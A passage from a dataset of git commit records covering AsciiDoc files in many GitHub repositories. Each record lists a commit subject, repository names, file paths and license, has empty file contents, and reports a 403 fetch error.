rch,MaineC\/elasticsearch,tahaemin\/elasticsearch,xpandan\/elasticsearch,kubum\/elasticsearch,obourgain\/elasticsearch,wittyameta\/elasticsearch,TonyChai24\/ESSource,palecur\/elasticsearch,SergVro\/elasticsearch,naveenhooda2000\/elasticsearch,overcome\/elasticsearch,acchen97\/elasticsearch,sauravmondallive\/elasticsearch,areek\/elasticsearch,feiqitian\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,nazarewk\/elasticsearch,alexbrasetvik\/elasticsearch,kubum\/elasticsearch,mm0\/elasticsearch,koxa29\/elasticsearch,StefanGor\/elasticsearch,smflorentino\/elasticsearch,wuranbo\/elasticsearch,kevinkluge\/elasticsearch,socialrank\/elasticsearch,zhiqinghuang\/elasticsearch,nilabhsagar\/elasticsearch,kunallimaye\/elasticsearch,fekaputra\/elasticsearch,luiseduardohdbackup\/elasticsearch,strapdata\/elassandra-test,linglaiyao1314\/elasticsearch,scottsom\/elasticsearch,dylan8902\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,hydro2k\/elasticsearch,tkssharma\/elasticsearch,tahaemin\/elasticsearch,JackyMai\/elasticsearch,nomoa\/elasticsearch,shreejay\/elasticsearch,KimTaehee\/elasticsearch,apepper\/elasticsearch,Uiho\/elasticsearch,LeoYao\/elasticsearch,Shekharrajak\/elasticsearch,Shepard1212\/elasticsearch,hanswang\/elasticsearch,kcompher\/elasticsearch,Ansh90\/elasticsearch,kalimatas\/elasticsearch,mortonsykes\/elasticsearch,sdauletau\/elasticsearch,LeoYao\/elasticsearch,yuy168\/elasticsearch,kcompher\/elasticsearch,hanswang\/elasticsearch,slavau\/elasticsearch,zhiqinghuang\/elasticsearch,iamjakob\/elasticsearch,lydonchandra\/elasticsearch,anti-social\/elasticsearch,kalimatas\/elasticsearch,mcku\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ImpressTV\/elasticsearch,ThalaivaStars\/OrgRepo1,ESamir\/elasticsearch,masaruh\/elasticsearch,fekaputra\/elasticsearch,sposam\/elasticsearch,s1monw\/elasticsearch,mmaracic\/elasticsearch,tkssharma\/elasticsearch,robin13\/elasticsearch,njlawton\/elasticsearch,iamjakob\/elasticsearch,mkis-\/elasticsearch,nrkkalyan\/elasticsearch,PhaedrusTheGreek\/elasticsearch,NBSW\/elasticsearch,humandb\/elasticsearch,Siddartha07\/elasticsearch,sjohnr\/elasticsearch,mkis-\/elasticsearch,EasonYi\/elasticsearch,MisterAndersen\/elasticsearch,pritishppai\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,maddin2016\/elasticsearch,TonyChai24\/ESSource,ulkas\/elasticsearch,pritishppai\/elasticsearch,queirozfcom\/elasticsearch,strapdata\/elassandra,ESamir\/elasticsearch,strapdata\/elassandra,alexkuk\/elasticsearch,btiernay\/elasticsearch,queirozfcom\/elasticsearch,Brijeshrpatel9\/elasticsearch,cwurm\/elasticsearch,adrianbk\/elasticsearch,hanst\/elasticsearch,Charlesdong\/elasticsearch,EasonYi\/elasticsearch,VukDukic\/elasticsearch,himanshuag\/elasticsearch,EasonYi\/elasticsearch,schonfeld\/elasticsearch,yanjunh\/elasticsearch,pranavraman\/elasticsearch,IanvsPoplicola\/elasticsearch,acchen97\/elasticsearch,dylan8902\/elasticsearch,areek\/elasticsearch,sneivandt\/elasticsearch,mnylen\/elasticsearch,ulkas\/elasticsearch,davidvgalbraith\/elasticsearch,dataduke\/elasticsearch,naveenhooda2000\/elasticsearch,queirozfcom\/elasticsearch,MisterAndersen\/elasticsearch,geidies\/elasticsearch,cnfire\/elasticsearch-1,ImpressTV\/elasticsearch,18098924759\/elasticsearch,easonC\/elasticsearch,Liziyao\/elasticsearch,overcome\/elasticsearch,hafkensite\/elasticsearch,F0lha\/elasticsearch,martinstuga\/elasticsearch,djschny\/elasticsearch,nellicus\/elasticsearch,truemped\/elasticsearch,scorpionvicky\/elasticsearch,caengcjd\/elasticsearch,LewayneNaidoo\/elasticsearch,gingerwizard\/elasticsearch,onegambler\/elasticsearch,C-Bish\/elasticsearch,myelin\/elasticsearch,achow\/elasticsearch,strapdata\/elassandra5-rc,jango2015\/elasticsearch,sc0ttkclark\/elasticsearch,dpursehouse\/elasticsearch,polyfractal\/elasticsearch,shreejay\/elasticsearch,xuzha\/elasticsearch,Fsero\/elasticsearch,masaruh\/elasticsearch,PhaedrusTheGreek\/elasticsearch,vrkansagara\/elasticsearch,schonfeld\/elasticsearch,abibell\/elasticsearch,mbrukman\/elasticsearch,jango2015\/elasticsearch,xuzha\/elasticsearch,mapr\/elasticsearch,springning\/elasticsearch,clintongormley\/elasticsearch,likaiwalkman\/elasticsearch,jbertouch\/elasticsearch,martinstuga\/elasticsearch,andrejserafim\/elasticsearch,mm0\/elasticsearch,Ansh90\/elasticsearch,xingguang2013\/elasticsearch,mkis-\/elasticsearch,ouyangkongtong\/elasticsearch,mgalushka\/elasticsearch,bestwpw\/elasticsearch,nilabhsagar\/elasticsearch,clintongormley\/elasticsearch,xingguang2013\/elasticsearch,Brijeshrpatel9\/elasticsearch,dpursehouse\/elasticsearch,mnylen\/elasticsearch,geidies\/elasticsearch,davidvgalbraith\/elasticsearch,LeoYao\/elasticsearch,fforbeck\/elasticsearch,polyfractal\/elasticsearch,dongjoon-hyun\/elasticsearch,adrianbk\/elasticsearch,a2lin\/elasticsearch,davidvgalbraith\/elasticsearch,rajanm\/elasticsearch,kenshin233\/elasticsearch,vingupta3\/elasticsearch,brandonkearby\/elasticsearch,heng4fun\/elasticsearch,weipinghe\/elasticsearch,Ansh90\/elasticsearch,kimimj\/elasticsearch,mcku\/elasticsearch,milodky\/elasticsearch,golubev\/elasticsearch,hafkensite\/elasticsearch,markllama\/elasticsearch,myelin\/elasticsearch,lchennup\/elasticsearch,andrejserafim\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Rygbee\/elasticsearch,golubev\/elasticsearch,nrkkalyan\/elasticsearch,hydro2k\/elasticsearch,yuy168\/elasticsearch,hanst\/elasticsearch,abibell\/elasticsearch,wayeast\/elasticsearch,Shekharrajak\/elasticsearch,kevinkluge\/elasticsearch,loconsolutions\/elasticsearch,lightslife\/elasticsearch,kalburgimanjunath\/elasticsearch,karthikjaps\/elasticsearch,szroland\/elasticsearch,loconsolutions\/elasticsearch,yynil\/elasticsearch,elasticdog\/elasticsearch,fred84\/elasticsearch,MaineC\/elasticsearch,AshishThakur\/elasticsearch,JervyShi\/elasticsearch,Helen-Zhao\/elasticsearch,hanst\/elasticsearch,dataduke\/elasticsearch,kunallimaye\/elasticsearch,sjohnr\/elasticsearch,rento19962\/elasticsearch,lydonchandra\/elasticsearch,artnowo\/elasticsearch,markllama\/elasticsearch,Collaborne\/elasticsearch,jeteve\/elasticsearch,feiqitian\/elasticsearch,lchennup\/elasticsearch,likaiwalkman\/elasticsearch,ThalaivaStars\/OrgRepo1,jpountz\/elasticsearch,HarishAtGitHub\/elasticsearch,wimvds\/elasticsearch,jimhooker2002\/elasticsearch,petabytedata\/elasticsearch,petabytedata\/elasticsearch,springning\/elasticsearch,pablocastro\/elasticsearch,strapdata\/elassandra5-rc,Widen\/elasticsearch,obourgain\/elasticsearch,pranavraman\/elasticsearch,vvcephei\/elasticsearch,JSCooke\/elasticsearch,pranavraman\/elasticsearch,zhiqinghuang\/elasticsearch,yynil\/elasticsearch,sdauletau\/elasticsearch,achow\/elasticsearch,umeshdangat\/elasticsearch,zeroctu\/elasticsearch,vietlq\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,vvcephei\/elasticsearch,mrorii\/elasticsearch,karthikjaps\/elasticsearch,codebunt\/elasticsearch,khiraiwa\/elasticsearch,acchen97\/elasticsearch,rhoml\/elasticsearch,hirdesh2008\/elasticsearch,lydonchandra\/elasticsearch,iamjakob\/elasticsearch,AshishThakur\/elasticsearch,liweinan0423\/elasticsearch,winstonewert\/elasticsearch,Stacey-Gammon\/elasticsearch,Liziyao\/elasticsearch,Siddartha07\/elasticsearch,areek\/elasticsearch,knight1128\/elasticsearch,rmuir\/elasticsearch,Asimov4\/elasticsearch,huanzhong\/elasticsearch,achow\/elasticsearch,spiegela\/elasticsearch,mmaracic\/elasticsearch,yynil\/elasticsearch,pritishppai\/elasticsearch,C-Bish\/elasticsearch,milodky\/elasticsearch,chirilo\/elasticsearch,diendt\/elasticsearch,zhiqinghuang\/elasticsearch,ricardocerq\/elasticsearch,strapdata\/elassandra5-rc,rmuir\/elasticsearch,pablocastro\/elasticsearch,mbrukman\/elasticsearch,yuy168\/elasticsearch,i-am-Nathan\/elasticsearch,VukDukic\/elasticsearch,diendt\/elasticsearch,jeteve\/elasticsearch,LewayneNaidoo\/elasticsearch,iacdingping\/elasticsearch,brandonkearby\/elasticsearch,acchen97\/elasticsearch,chirilo\/elasticsearch,Brijeshrpatel9\/elasticsearch,lightslife\/elasticsearch,i-am-Nathan\/elasticsearch,chrismwendt\/elasticsearch,kunallimaye\/elasticsearch,beiske\/elasticsearch,humandb\/elasticsearch,wimvds\/elasticsearch,Chhunlong\/elasticsearch,jaynblue\/elasticsearch,onegambler\/elasticsearch,xuzha\/elasticsearch,wimvds\/elasticsearch,sarwarbhuiyan\/elasticsearch,lzo\/elasticsearch-1,abibell\/elasticsearch,nrkkalyan\/elasticsearch,jango2015\/elasticsearch,yongminxia\/elasticsearch,jw0201\/elastic,dpursehouse\/elasticsearch,weipinghe\/elasticsearch,sneivandt\/elasticsearch,janmejay\/elasticsearch,nomoa\/elasticsearch,alexbrasetvik\/elasticsearch,vingupta3\/elasticsearch,rmuir\/elasticsearch,mm0\/elasticsearch,sauravmondallive\/elasticsearch,Siddartha07\/elasticsearch,lchennup\/elasticsearch,iantruslove\/elasticsearch,socialrank\/elasticsearch,javachengwc\/elasticsearch,bestwpw\/elasticsearch,pozhidaevak\/elasticsearch,elancom\/elasticsearch,hechunwen\/elasticsearch,girirajsharma\/elasticsearch,mrorii\/elasticsearch,djschny\/elasticsearch,kingaj\/elasticsearch,sneivandt\/elasticsearch,diendt\/elasticsearch,Flipkart\/elasticsearch,lmtwga\/elasticsearch,beiske\/elasticsearch,wayeast\/elasticsearch,kalimatas\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,gmarz\/elasticsearch,Ansh90\/elasticsearch,Ansh90\/elasticsearch,sjohnr\/elasticsearch,infusionsoft\/elasticsearch,brandonkearby\/elasticsearch,combinatorist\/elasticsearch,linglaiyao1314\/elasticsearch,henakamaMSFT\/elasticsearch,uschindler\/elasticsearch,fekaputra\/elasticsearch,smflorentino\/elasticsearch,rlugojr\/elasticsearch,sarwarbhuiyan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,njlawton\/elasticsearch,mrorii\/elasticsearch,lydonchandra\/elasticsearch,onegambler\/elasticsearch,khiraiwa\/elasticsearch,kalimatas\/elasticsearch,spiegela\/elasticsearch,ImpressTV\/elasticsearch,martinstuga\/elasticsearch,jchampion\/elasticsearch,AndreKR\/elasticsearch,alexbrasetvik\/elasticsearch,njlawton\/elasticsearch,AndreKR\/elasticsearch,btiernay\/elasticsearch,gingerwizard\/elasticsearch,likaiwalkman\/elasticsearch,areek\/elasticsearch,Collaborne\/elasticsearch,coding0011\/elasticsearch,EasonYi\/elasticsearch,mortonsykes\/elasticsearch,combinatorist\/elasticsearch,onegambler\/elasticsearch,vietlq\/elasticsearch,i-am-Nathan\/elasticsearch,kenshin233\/elasticsearch,alexkuk\/elasticsearch,szroland\/elasticsearch,bawse\/elasticsearch,winstonewert\/elasticsearch,mortonsykes\/elasticsearch,camilojd\/elasticsearch,artnowo\/elasticsearch,markharwood\/elasticsearch,nrkkalyan\/elasticsearch,masaruh\/elasticsearch,MichaelLiZhou\/elasticsearch,MjAbuz\/elasticsearch,bawse\/elasticsearch,likaiwalkman\/elasticsearch,rhoml\/elasticsearch,xpandan\/elasticsearch,elancom\/elasticsearch,jimhooker2002\/elasticsearch,MjAbuz\/elasticsearch,Liziyao\/elasticsearch,queirozfcom\/elasticsearch,kunallimaye\/elasticsearch,rlugojr\/elasticsearch,chrismwendt\/elasticsearch,andrestc\/elasticsearch,Liziyao\/elasticsearch,glefloch\/elasticsearch,winstonewert\/elasticsearch,chirilo\/elasticsearch,strapdata\/elassandra,ivansun1010\/elasticsearch,anti-social\/elasticsearch,sarwarbhuiyan\/elasticsearch,NBSW\/elasticsearch,jeteve\/elasticsearch,ImpressTV\/elasticsearch,ckclark\/elasticsearch,mrorii\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,sauravmondallive\/elasticsearch,elancom\/elasticsearch,avikurapati\/elasticsearch,GlenRSmith\/elasticsearch,Brijeshrpatel9\/elasticsearch,heng4fun\/elasticsearch,jango2015\/elasticsearch,girirajsharma\/elasticsearch,springning\/elasticsearch,smflorentino\/elasticsearch,KimTaehee\/elasticsearch,MisterAndersen\/elasticsearch,yongminxia\/elasticsearch,obourgain\/elasticsearch,koxa29\/elasticsearch,jw0201\/elastic,Microsoft\/elasticsearch,karthikjaps\/elasticsearch,gmarz\/elasticsearch,nazarewk\/elasticsearch,fekaputra\/elasticsearch,tebriel\/elasticsearch,umeshdangat\/elasticsearch,strapdata\/elassandra-test,infusionsoft\/elasticsearch,Fsero\/elasticsearch,vingupta3\/elasticsearch,strapdata\/elassandra,infusionsoft\/elasticsearch,JSCooke\/elasticsearch,episerver\/elasticsearch,aglne\/elasticsearch,markharwood\/elasticsearch","old_file":"docs\/reference\/setup\/repositories.asciidoc","new_file":"docs\/reference\/setup\/repositories.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0ae4f6a851d2301dc6273b6f7e2f5603ceb81d85","subject":"need to cover scan consistency","message":"need to cover scan consistency\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1680bd7fc841070336653a63903f63e42a5d538b","subject":"y2b create post Bed Full of Gadgets","message":"y2b create post Bed Full of Gadgets","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-09-Bed-Full-of-Gadgets.adoc","new_file":"_posts\/2012-01-09-Bed-Full-of-Gadgets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d054c4a195c4b1b1a860c480561a564a2c67f356","subject":"Update 2017-12-09-CSS-Cheat-Selectors.adoc","message":"Update 2017-12-09-CSS-Cheat-Selectors.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-12-09-CSS-Cheat-Selectors.adoc","new_file":"_posts\/2017-12-09-CSS-Cheat-Selectors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2a686177891cfaea985e58b4db2c66049f432f3","subject":"Publish 2016-6-28-PHPER-authority-control.adoc","message":"Publish 2016-6-28-PHPER-authority-control.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-28-PHPER-authority-control.adoc","new_file":"2016-6-28-PHPER-authority-control.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54d35e3fcc0a03a2b0cd7ef466dc5337161ec910","subject":"Late 2019 Release (#332)","message":"Late 2019 Release (#332)\n\n\r\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2019-11-18-release.adoc","new_file":"content\/news\/2019-11-18-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"40b180b7c244b17fedd55ea9c97ad778ddcdb157","subject":"Update 2017-05-16-Post-JSON-to-a-RES-Tul-service-without-wget-curl-netcat.adoc","message":"Update 2017-05-16-Post-JSON-to-a-RES-Tul-service-without-wget-curl-netcat.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-05-16-Post-JSON-to-a-RES-Tul-service-without-wget-curl-netcat.adoc","new_file":"_posts\/2017-05-16-Post-JSON-to-a-RES-Tul-service-without-wget-curl-netcat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b12c7bc83565aef647e7045bc4c838a15f0ccfa","subject":"removed a some remarks about \"error lines\"","message":"removed a some remarks about \"error lines\"\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/concepts\/concepts.asciidoc","new_file":"asciidoc\/concepts\/concepts.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"af5877224a12fdfded2c86722f57e6cd4b4cb3bf","subject":"Publish 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Publish 2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e67413ff0841673f83771ad4801c00d003e4dc1","subject":"Update 2016-02-29-Flat-File-C-M-S-Systeme-auf-Git-Hub.adoc","message":"Update 2016-02-29-Flat-File-C-M-S-Systeme-auf-Git-Hub.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Flat-File-C-M-S-Systeme-auf-Git-Hub.adoc","new_file":"_posts\/2016-02-29-Flat-File-C-M-S-Systeme-auf-Git-Hub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d6c6e950ce08b13c32685d239b51535ce5df5cb","subject":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","message":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5d2c1e960a2a619d2a581b4834638d1734a9395","subject":"update QSFP+\/SFP+ support","message":"update QSFP+\/SFP+ support\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3c123b2048124da4612b75cd805091e87f625df4","subject":"Update 2015-08-16-Ubuntu-1404-BPG.adoc","message":"Update 2015-08-16-Ubuntu-1404-BPG.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-08-16-Ubuntu-1404-BPG.adoc","new_file":"_posts\/2015-08-16-Ubuntu-1404-BPG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04e937e8ee2a11057993c8fdd7ef6465995b3671","subject":"Update 2016-11-22-Tuesday-Morning.adoc","message":"Update 2016-11-22-Tuesday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-22-Tuesday-Morning.adoc","new_file":"_posts\/2016-11-22-Tuesday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"729bfc5fba38a81e011c77ddce8b68b0fb50ee8b","subject":"Hawkular Metrics 0.7.0 - release announcement","message":"Hawkular Metrics 0.7.0 - release announcement\n","repos":"lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/09\/30\/hawkular-metrics-0.7.0.Final-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/09\/30\/hawkular-metrics-0.7.0.Final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d1e68f0de725f42d8b85120a4cf60472b7b9fa7","subject":"Add news\/2016-07-15-forge-3.2.3.final.asciidoc","message":"Add news\/2016-07-15-forge-3.2.3.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-07-15-forge-3.2.3.final.asciidoc","new_file":"news\/2016-07-15-forge-3.2.3.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"169ec26ebe9ad2dfae20c125e7fed754f862d8e7","subject":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","message":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"723909a683c482924448f67aa3d4c4cd12cde90e","subject":"Delete the file at '_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc'","message":"Delete the file at '_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7bc2b88c72614f3b6473ec8918e2de49c398f1e0","subject":"Update 2017-06-13-Your-Blog-title2.adoc","message":"Update 2017-06-13-Your-Blog-title2.adoc","repos":"zakkum42\/zakkum42.github.io,zakkum42\/zakkum42.github.io,zakkum42\/zakkum42.github.io,zakkum42\/zakkum42.github.io","old_file":"_posts\/2017-06-13-Your-Blog-title2.adoc","new_file":"_posts\/2017-06-13-Your-Blog-title2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zakkum42\/zakkum42.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"366074ff919556158d9d06ffe28e840bc84d43db","subject":"Fix typographical errors in readme","message":"Fix typographical errors in readme","repos":"dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3fa9526461246c11aa9bf683225d796cd59a9893","subject":"Update 2015-05-08-iOS-interview-part-5.adoc","message":"Update 2015-05-08-iOS-interview-part-5.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-05-08-iOS-interview-part-5.adoc","new_file":"_posts\/2015-05-08-iOS-interview-part-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56a8dcb3f7a63a9b443e1323e97f851e52644e41","subject":"Update 2016-03-29-Conocido-Desconocido.adoc","message":"Update 2016-03-29-Conocido-Desconocido.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d845674f65d1f226cdae898bbb5778c418c82cfa","subject":"Update 2017-07-22-Bechmarking-HIP-Cffe.adoc","message":"Update 2017-07-22-Bechmarking-HIP-Cffe.adoc","repos":"itsnarsi\/itsnarsi.github.io,itsnarsi\/itsnarsi.github.io,itsnarsi\/itsnarsi.github.io,itsnarsi\/itsnarsi.github.io","old_file":"_posts\/2017-07-22-Bechmarking-HIP-Cffe.adoc","new_file":"_posts\/2017-07-22-Bechmarking-HIP-Cffe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/itsnarsi\/itsnarsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d622329eb2888f987dab3bafef7e09f26ec93c3","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59199ba3448c994bb5ccd15570cec2346be437ac","subject":"Delete notes.asciidoc","message":"Delete 